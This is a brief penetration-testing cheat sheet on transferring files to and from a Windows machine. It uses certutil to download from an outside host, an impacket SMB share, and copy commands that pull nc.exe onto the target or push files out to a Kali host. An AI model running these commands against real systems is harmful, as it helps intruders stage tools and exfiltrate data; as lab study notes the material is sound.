To Windows

to window

  • Certutil

    certutil -urlcache -f http://10.10.10.10/<file> <path to paste>

  • Invoke

  • SMB server

    • cd to dir which you want to share

    • impacket-smbserver share . -smb2support

    • on window

      • to check dir \\192.168.119.133\share

      • to copy from window copy <file> \\192.168.119.133\share\

      • to copy from kali copy \\192.168.119.133\share\nc.exe <path to paste>

Last updated